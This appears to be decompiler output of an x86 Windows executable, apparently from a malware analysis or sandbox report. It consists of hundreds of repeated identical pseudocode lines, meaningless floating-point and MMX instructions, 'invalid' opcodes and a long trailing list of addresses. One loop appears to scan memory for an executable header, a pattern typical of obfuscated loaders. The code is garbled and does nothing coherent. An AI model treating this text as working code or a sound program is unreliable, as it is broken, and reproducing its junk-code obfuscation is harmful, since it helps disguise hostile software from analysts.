                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *((intOrPtr*)(_t155 + 0x7a)) =  *((intOrPtr*)(_t155 + 0x7a)) + _t59;
                            				_t60 = _t59 + 1;
                            				_t157 = _t155 - 1 + 1;
                            				asm("psrlq xmm0, 0xae");
                            				asm("frndint");
                            				_t62 = _t60 - 1 + 1;
                            				asm("fcos");
                            				_t63 = _t62 - 1;
                            				_t64 = _t63 + 1;
                            				_t173 = _t172 - 1;
                            				asm("faddp st2, st0");
                            				asm("fyl2xp1");
                            				_t174 = _t173 + 1;
                            				asm("sbb ch, [edx-0x2107fefb]");
                            				_t65 = _t64 + 0xeedef801;
                            				asm("clc");
                            				asm("fsubp st6, st0");
                            				asm("out dx, al");
                            				asm("fsin");
                            				asm("invalid");
                            				_t102 = _t101 - 1;
                            				_t159 = _t157 - 1 + 1;
                            				asm("pslld xmm5, 0x87");
                            				asm("fclex");
                            				_t67 = _t65 - 1 + 1;
                            				asm("fxam");
                            				asm("fldl2e");
                            				_t123 = 0x1490dad;
                            				_t103 = _t102 - 1;
                            				asm("fdivr st5, st0");
                            				asm("pandn mm6, mm4");
                            				_t104 = _t103 + 1;
                            				_t151 = 0x3b;
                            				asm("psrad mm7, mm2");
                            				asm("pxor mm1, mm2");
                            				_t161 = _t159 - 1 + 1;
                            				asm("clc");
                            				asm("fsincos");
                            				asm("fcom st0, st7");
                            				do {
                            					asm("fnop");
                            					asm("clc");
                            					asm("pcmpeqw mm7, mm1");
                            					asm("psrlq xmm0, 0xae");
                            					asm("clc");
                            					asm("wait");
                            					asm("fninit");
                            					_t105 = _t104 - 1;
                            					asm("pause");
                            					asm("fcos");
                            					_t106 = _t105 + 1;
                            					_t69 = _t67 - 1 + 1;
                            					asm("fdivr st1, st0");
                            					asm("faddp st2, st0");
                            					_t163 = _t161 - 1 + 1;
                            					asm("punpcklwd mm2, mm1");
                            					asm("fsubp st6, st0");
                            					_t125 = _t123 - 1 + 1;
                            					asm("fcomp st0, st2");
                            					asm("pslld xmm5, 0x87");
                            					_t174 = _t174 - 1 + 1;
                            					_t164 = _t163 - 1;
                            					asm("fdecstp");
                            					asm("fxam");
                            					_t161 = _t164 + 1;
                            					_t123 = _t125 - 1;
                            					_t107 = _t106 - 1;
                            					asm("ftst");
                            					asm("fdivr st5, st0");
                            					_t104 = _t107 + 1;
                            					_t67 = _t69 - 1 + 1;
                            					asm("emms");
                            					asm("psrad mm7, mm2");
                            					_t227 = _t123;
                            					_t194 = _t183;
                            					_pop(_t183);
                            				} while (_t227 != 0);
                            				asm("clc");
                            				asm("fxch st0, st1");
                            				asm("fsincos");
                            				asm("clc");
                            				_t71 = __imp__#690;
                            				asm("adc [eax], al");
                            				 *((intOrPtr*)(_t71 - 0x27)) =  *((intOrPtr*)(_t71 - 0x27)) + _t123;
                            				asm("fldl2t");
                            				asm("pcmpeqw mm7, mm1");
                            				asm("stc");
                            				__eflags = __edi;
                            				_t74 = _t71 + 1 - 1 + 1;
                            				asm("ffree st5");
                            				asm("pause");
                            				asm("fdivr st1, st0");
                            				_t75 = _t74 - 1;
                            				asm("fclex");
                            				asm("punpcklwd mm2, mm1");
                            				_t78 = _t75 + 1 - 1 + 1;
                            				asm("fpatan");
                            				asm("fcomp st0, st2");
                            				asm("fsqrt");
                            				asm("fdecstp");
                            				asm("pmaddwd xmm0, xmm5");
                            				asm("ftst");
                            				_t135 = 0x905a4d;
                            				asm("fdivrp st4, st0");
                            				asm("emms");
                            				_t166 = _t161 - 1 + 1;
                            				_t79 = _t78 - 1;
                            				asm("fdivrp st6, st0");
                            				asm("ffree st1");
                            				_t80 = _t79 + 1;
                            				goto L71;
                            				asm("cld");
                            				_t81 = _t80 - 1;
                            				_t82 = _t81 - 1;
                            				asm("punpckldq mm3, mm4");
                            				asm("invalid");
                            				asm("fucom st1");
                            				_t80 = _t82 + 1;
                            				_t231 =  *_t80 - _t135;
                            				asm("wait");
                            				asm("fclex");
                            				asm("punpckhdq xmm2, xmm4");
                            				asm("invalid");
                            				asm("invalid");
                            				_pop(ds);
                            				asm("invalid");
                            				if (_t231 != 0) goto L71;
                            				asm("sti");
                            				asm("invalid");
                            				asm("invalid");
                            			}





































































                            0x00401e3c
                            0x00401e3c
                            0x00401e3c
                            0x00401e3c
                            0x00401e3c
                            0x00401e3c
                            0x00401e3c
                            0x00401e3d
                            0x00401e3f
                            0x00401e44
                            0x00401e46
                            0x00401e48
                            0x00401e4a
                            0x00401e4e
                            0x00401e50
                            0x00401e51
                            0x00401e53
                            0x00401e57
                            0x00401e59
                            0x00401e5b
                            0x00401e5d
                            0x00401e5d
                            0x00401e60
                            0x00401e60
                            0x00401e64
                            0x00401e67
                            0x00401e69
                            0x00401e6f
                            0x00401e79
                            0x00401e7a
                            0x00401e7b
                            0x00401e7e
                            0x00401e7f
                            0x00401e80
                            0x00401e83
                            0x00401e85
                            0x00401e87
                            0x00401e88
                            0x00401e89
                            0x00401e8a
                            0x00401e8c
                            0x00401e8d
                            0x00401e8e
                            0x00401e8f
                            0x00401e95
                            0x00401e95
                            0x00401e98
                            0x00401e9a
                            0x00401e9c
                            0x00401e9e
                            0x00401ea0
                            0x00401ea2
                            0x00401ea3
                            0x00401ea4
                            0x00401ea7
                            0x00401ea8
                            0x00401eac
                            0x00401eae
                            0x00401eae
                            0x00401eaf
                            0x00401eaf
                            0x00401eaf
                            0x00401eb2
                            0x00401f28
                            0x00401f28
                            0x00401f29
                            0x00401f2a
                            0x00401f2d
                            0x00401f2f
                            0x00401f33
                            0x00401f34
                            0x00401f38
                            0x00401f39
                            0x00401f3a
                            0x00401f3c
                            0x00401f3d
                            0x00000000
                            0x00401eb4
                            0x00401eb4
                            0x00401eb5
                            0x00401eb6
                            0x00401f1d
                            0x00401f1d
                            0x00000000
                            0x00401eb8
                            0x00401eba
                            0x00401ebf
                            0x00401ec1
                            0x00401ec2
                            0x00401ec3
                            0x00401ec9
                            0x00401ecb
                            0x00401ecd
                            0x00401ece
                            0x00401ed1
                            0x00401ed2
                            0x00401ed6
                            0x00401ed8
                            0x00401eda
                            0x00401eda
                            0x00401edb
                            0x00401edc
                            0x00401f47
                            0x00401f47
                            0x00401f4b
                            0x00401f51
                            0x00401f53
                            0x00401f54
                            0x00401f55
                            0x00000000
                            0x00401f57
                            0x00401f57
                            0x00401f5e
                            0x00401f60
                            0x00401f61
                            0x00401f63
                            0x00401f64
                            0x00401f65
                            0x00401f66
                            0x00401f67
                            0x00401f6c
                            0x00401f6d
                            0x00401f6e
                            0x00401f70
                            0x00401f71
                            0x00401f72
                            0x00401f73
                            0x00401f79
                            0x00401f7e
                            0x00000000
                            0x00401f7e
                            0x00401ede
                            0x00401ede
                            0x00401edf
                            0x00401ee0
                            0x00401ee3
                            0x00401ee8
                            0x00401eea
                            0x00401ef0
                            0x00401ef2
                            0x00401ef4
                            0x00401ef6
                            0x00401ef7
                            0x00401efb
                            0x00401efd
                            0x00401eff
                            0x00401eff
                            0x00401f01
                            0x00401f05
                            0x00401f08
                            0x00401f09
                            0x00401f80
                            0x00401f80
                            0x00000000
                            0x00401f0b
                            0x00401f0b
                            0x00401f82
                            0x00401f82
                            0x00401f85
                            0x00401f88
                            0x00401f88
                            0x00401f8b
                            0x00401f94
                            0x00401f98
                            0x00401f9f
                            0x00401fa0
                            0x00401fa1
                            0x00401fa2
                            0x00401fa8
                            0x00401fad
                            0x00401faf
                            0x00401fb1
                            0x00401fb2
                            0x00401fb8
                            0x00401fb9
                            0x00401fba
                            0x00401fbb
                            0x00401fbf
                            0x00401fc1
                            0x00401fc7
                            0x00401fc9
                            0x00401fc9
                            0x00401fc9
                            0x00401fcb
                            0x00401fcb
                            0x00401fcd
                            0x00401fce
                            0x00401fcf
                            0x00401fcf
                            0x00401fd5
                            0x00401fd7
                            0x00401fda
                            0x00401fdc
                            0x00401fde
                            0x00401fe4
                            0x00401fe6
                            0x00401fe8
                            0x00401fea
                            0x00401fec
                            0x00401fee
                            0x00401ff1
                            0x00401ff3
                            0x00401ff5
                            0x00401ff7
                            0x00401ff9
                            0x00401ffb
                            0x00401ffd
                            0x00401fff
                            0x00401fff
                            0x00401f0d
                            0x00401f0d
                            0x00401f0e
                            0x00401f10
                            0x00401f12
                            0x00401f18
                            0x00401f1a
                            0x00401f1b
                            0x00000000
                            0x00401f1b
                            0x00401f1f
                            0x00401f1f
                            0x00401f21
                            0x00401f23
                            0x00401f25
                            0x00401f27
                            0x00000000
                            0x00401f27
                            0x00401f43
                            0x00401f43
                            0x00401f45
                            0x00401f46
                            0x00000000
                            0x00401f46
                            0x00401f0b
                            0x00401f09
                            0x00401edc
                            0x00401eb6
                            0x00402001
                            0x00402003
                            0x00402005
                            0x0040200a
                            0x0040200c
                            0x0040200e
                            0x00402010
                            0x00402012
                            0x00402014
                            0x00402016
                            0x00402018
                            0x0040201a
                            0x0040201c
                            0x0040201e
                            0x00402020
                            0x00402022
                            0x00402024
                            0x00402026
                            0x00402028
                            0x0040202a
                            0x0040202c
                            0x0040202e
                            0x00402030
                            0x00402032
                            0x00402034
                            0x00402036
                            0x00402038
                            0x0040203a
                            0x0040203c
                            0x0040203e
                            0x00402040
                            0x00402042
                            0x00402044
                            0x00402046
                            0x00402048
                            0x0040204a
                            0x0040204c
                            0x0040204e
                            0x00402050
                            0x00402052
                            0x00402054
                            0x00402056
                            0x00402058
                            0x0040205a
                            0x0040205c
                            0x0040205e
                            0x00402060
                            0x00402062
                            0x00402064
                            0x00402066
                            0x00402068
                            0x0040206a
                            0x0040206c
                            0x0040206e
                            0x00402070
                            0x00402072
                            0x00402074
                            0x00402076
                            0x00402078
                            0x0040207a
                            0x0040207c
                            0x0040207e
                            0x00402080
                            0x00402082
                            0x00402084
                            0x00402086
                            0x00402088
                            0x0040208a
                            0x0040208c
                            0x0040208e
                            0x00402090
                            0x00402092
                            0x00402094
                            0x00402096
                            0x00402098
                            0x0040209a
                            0x0040209c
                            0x0040209e
                            0x004020a0
                            0x004020a2
                            0x004020a4
                            0x004020a6
                            0x004020a8
                            0x004020aa
                            0x004020ac
                            0x004020ae
                            0x004020b0
                            0x004020b2
                            0x004020b4
                            0x004020b6
                            0x004020b8
                            0x004020ba
                            0x004020bc
                            0x004020be
                            0x004020c0
                            0x004020c2
                            0x004020c4
                            0x004020c6
                            0x004020c8
                            0x004020ca
                            0x004020cc
                            0x004020ce
                            0x004020d0
                            0x004020d2
                            0x004020d4
                            0x004020d6
                            0x004020d8
                            0x004020da
                            0x004020dc
                            0x004020de
                            0x004020e0
                            0x004020e2
                            0x004020e4
                            0x004020e6
                            0x004020e8
                            0x004020ea
                            0x004020ec
                            0x004020ee
                            0x004020f0
                            0x004020f2
                            0x004020f4
                            0x004020f6
                            0x004020f8
                            0x004020fa
                            0x004020fc
                            0x004020fe
                            0x00402100
                            0x00402102
                            0x00402104
                            0x00402106
                            0x00402108
                            0x0040210a
                            0x0040210c
                            0x0040210e
                            0x00402110
                            0x00402112
                            0x00402114
                            0x00402116
                            0x00402118
                            0x0040211a
                            0x0040211c
                            0x0040211e
                            0x00402120
                            0x00402122
                            0x00402124
                            0x00402126
                            0x00402128
                            0x0040212a
                            0x0040212c
                            0x0040212e
                            0x00402130
                            0x00402132
                            0x00402134
                            0x00402136
                            0x00402138
                            0x0040213a
                            0x0040213c
                            0x0040213e
                            0x00402140
                            0x00402142
                            0x00402144
                            0x00402146
                            0x00402148
                            0x0040214a
                            0x0040214c
                            0x0040214e
                            0x00402150
                            0x00402152
                            0x00402154
                            0x00402156
                            0x00402158
                            0x0040215a
                            0x0040215c
                            0x0040215e
                            0x00402160
                            0x00402162
                            0x00402164
                            0x00402166
                            0x00402168
                            0x0040216a
                            0x0040216c
                            0x0040216e
                            0x00402170
                            0x00402172
                            0x00402174
                            0x00402176
                            0x00402178
                            0x0040217a
                            0x0040217c
                            0x0040217e
                            0x00402180
                            0x00402182
                            0x00402184
                            0x00402186
                            0x00402188
                            0x0040218a
                            0x0040218c
                            0x0040218e
                            0x00402190
                            0x00402192
                            0x00402194
                            0x00402196
                            0x00402198
                            0x0040219a
                            0x0040219c
                            0x0040219e
                            0x004021a0
                            0x004021a2
                            0x004021a4
                            0x004021a6
                            0x004021a8
                            0x004021aa
                            0x004021ac
                            0x004021ae
                            0x004021b0
                            0x004021b2
                            0x004021b4
                            0x004021b6
                            0x004021b8
                            0x004021ba
                            0x004021bc
                            0x004021be
                            0x004021c0
                            0x004021c2
                            0x004021c4
                            0x004021c6
                            0x004021c8
                            0x004021ca
                            0x004021cc
                            0x004021ce
                            0x004021d0
                            0x004021d2
                            0x004021d4
                            0x004021d6
                            0x004021d8
                            0x004021da
                            0x004021dc
                            0x004021de
                            0x004021e0
                            0x004021e2
                            0x004021e4
                            0x004021e6
                            0x004021e8
                            0x004021ea
                            0x004021ec
                            0x004021ee
                            0x004021f0
                            0x004021f2
                            0x004021f4
                            0x004021f6
                            0x004021f8
                            0x004021fa
                            0x004021fc
                            0x004021fe
                            0x00402200
                            0x00402202
                            0x00402204
                            0x00402206
                            0x00402208
                            0x0040220a
                            0x0040220c
                            0x0040220e
                            0x00402210
                            0x00402212
                            0x00402214
                            0x00402216
                            0x00402218
                            0x0040221a
                            0x0040221c
                            0x0040221e
                            0x00402220
                            0x00402222
                            0x00402224
                            0x00402226
                            0x00402228
                            0x0040222a
                            0x0040222c
                            0x0040222e
                            0x00402230
                            0x00402232
                            0x00402234
                            0x00402236
                            0x00402238
                            0x0040223a
                            0x0040223c
                            0x0040223e
                            0x00402240
                            0x00402242
                            0x00402244
                            0x00402246
                            0x00402248
                            0x0040224a
                            0x0040224c
                            0x0040224e
                            0x00402250
                            0x00402252
                            0x00402254
                            0x00402256
                            0x00402258
                            0x0040225a
                            0x0040225c
                            0x0040225e
                            0x00402260
                            0x00402262
                            0x00402264
                            0x00402266
                            0x00402268
                            0x0040226a
                            0x0040226c
                            0x0040226e
                            0x00402270
                            0x00402272
                            0x00402274
                            0x00402276
                            0x00402278
                            0x0040227a
                            0x0040227c
                            0x0040227e
                            0x00402280
                            0x00402282
                            0x00402284
                            0x00402286
                            0x00402288
                            0x0040228a
                            0x0040228c
                            0x0040228e
                            0x00402290
                            0x00402292
                            0x00402294
                            0x00402296
                            0x00402298
                            0x0040229a
                            0x0040229c
                            0x0040229e
                            0x004022a0
                            0x004022a2
                            0x004022a4
                            0x004022a6
                            0x004022a8
                            0x004022aa
                            0x004022ac
                            0x004022ae
                            0x004022b0
                            0x004022b2
                            0x004022b4
                            0x004022b6
                            0x004022b8
                            0x004022ba
                            0x004022bc
                            0x004022be
                            0x004022c0
                            0x004022c2
                            0x004022c4
                            0x004022c6
                            0x004022c8
                            0x004022ca
                            0x004022cc
                            0x004022ce
                            0x004022d0
                            0x004022d2
                            0x004022d4
                            0x004022d6
                            0x004022d8
                            0x004022da
                            0x004022dc
                            0x004022de
                            0x004022e0
                            0x004022e2
                            0x004022e4
                            0x004022e6
                            0x004022e8
                            0x004022ea
                            0x004022ec
                            0x004022ee
                            0x004022f0
                            0x004022f2
                            0x004022f4
                            0x004022f6
                            0x004022f8
                            0x004022fa
                            0x004022fc
                            0x004022fe
                            0x00402300
                            0x00402302
                            0x00402304
                            0x00402306
                            0x00402308
                            0x0040230a
                            0x0040230c
                            0x0040230e
                            0x00402310
                            0x00402312
                            0x00402314
                            0x00402316
                            0x00402318
                            0x0040231a
                            0x0040231c
                            0x0040231e
                            0x00402320
                            0x00402322
                            0x00402324
                            0x00402326
                            0x00402328
                            0x0040232a
                            0x0040232c
                            0x0040232e
                            0x00402330
                            0x00402332
                            0x00402334
                            0x00402336
                            0x00402338
                            0x0040233a
                            0x0040233c
                            0x0040233e
                            0x00402340
                            0x00402342
                            0x00402344
                            0x00402346
                            0x00402348
                            0x0040234a
                            0x0040234c
                            0x0040234e
                            0x00402350
                            0x00402352
                            0x00402354
                            0x00402356
                            0x00402358
                            0x0040235a
                            0x0040235c
                            0x0040235e
                            0x00402360
                            0x00402362
                            0x00402364
                            0x00402366
                            0x00402368
                            0x0040236a
                            0x0040236c
                            0x0040236e
                            0x00402370
                            0x00402372
                            0x00402374
                            0x00402376
                            0x00402378
                            0x0040237a
                            0x0040237c
                            0x0040237e
                            0x00402380
                            0x00402382
                            0x00402384
                            0x00402386
                            0x00402388
                            0x0040238a
                            0x0040238c
                            0x0040238e
                            0x00402390
                            0x00402392
                            0x00402394
                            0x00402396
                            0x00402398
                            0x0040239a
                            0x0040239c
                            0x0040239e
                            0x004023a0
                            0x004023a2
                            0x004023a4
                            0x004023a6
                            0x004023a8
                            0x004023aa
                            0x004023ac
                            0x004023ae
                            0x004023b0
                            0x004023b2
                            0x004023b4
                            0x004023b6
                            0x004023b8
                            0x004023ba
                            0x004023bc
                            0x004023be
                            0x004023c0
                            0x004023c2
                            0x004023c4
                            0x004023c6
                            0x004023c8
                            0x004023ca
                            0x004023cc
                            0x004023ce
                            0x004023d0
                            0x004023d2
                            0x004023d4
                            0x004023d6
                            0x004023d8
                            0x004023da
                            0x004023dc
                            0x004023de
                            0x004023e0
                            0x004023e2
                            0x004023e4
                            0x004023e6
                            0x004023e8
                            0x004023ea
                            0x004023ec
                            0x004023ee
                            0x004023f0
                            0x004023f2
                            0x004023f4
                            0x004023f6
                            0x004023f8
                            0x004023fa
                            0x004023fc
                            0x004023fe
                            0x00402400
                            0x00402402
                            0x00402404
                            0x00402406
                            0x00402408
                            0x0040240a
                            0x0040240c
                            0x00402410
                            0x00402412
                            0x00402413
                            0x00402418
                            0x00402462
                            0x00402468
                            0x004024bc
                            0x004024bd
                            0x004024be
                            0x004024bf
                            0x004024c1
                            0x0040250c
                            0x0040250f
                            0x00402511
                            0x00402513
                            0x00402514
                            0x00402515
                            0x00402516
                            0x00402517
                            0x00402519
                            0x00402566
                            0x0040256d
                            0x00402572
                            0x004025c0
                            0x004025c2
                            0x004025c4
                            0x00402608
                            0x0040260e
                            0x0040260f
                            0x00402611
                            0x00402663
                            0x00402665
                            0x00402666
                            0x00402669
                            0x004026b8
                            0x004026b9
                            0x004026ba
                            0x004026bc
                            0x00402708
                            0x00402708
                            0x0040270a
                            0x0040270b
                            0x0040270e
                            0x00402759
                            0x0040275a
                            0x0040275b
                            0x0040275d
                            0x0040275e
                            0x00402760
                            0x004027a8
                            0x004027aa
                            0x004027ab
                            0x004027ad
                            0x004027f9
                            0x004027fa
                            0x004027fd
                            0x00402849
                            0x0040284b
                            0x0040284d
                            0x0040289f
                            0x004028a0
                            0x004028a1
                            0x004028a3
                            0x004028f7
                            0x004028f8
                            0x004028f9
                            0x004028fa
                            0x004028fc
                            0x0040293f
                            0x00402941
                            0x00402942
                            0x00402944
                            0x00402994
                            0x00402995
                            0x00402995
                            0x00402995
                            0x0040299c
                            0x0040299d
                            0x0040299f
                            0x004029f2
                            0x004029f3
                            0x004029f5
                            0x004029f7
                            0x004029f9
                            0x004029fb
                            0x004029fd
                            0x004029ff
                            0x00402a49
                            0x00402a4a
                            0x00402a4c
                            0x00402a96
                            0x00402aeb
                            0x00402aec
                            0x00402aee
                            0x00402b35
                            0x00402b36
                            0x00402b38
                            0x00402b83
                            0x00402b85
                            0x00402bd9
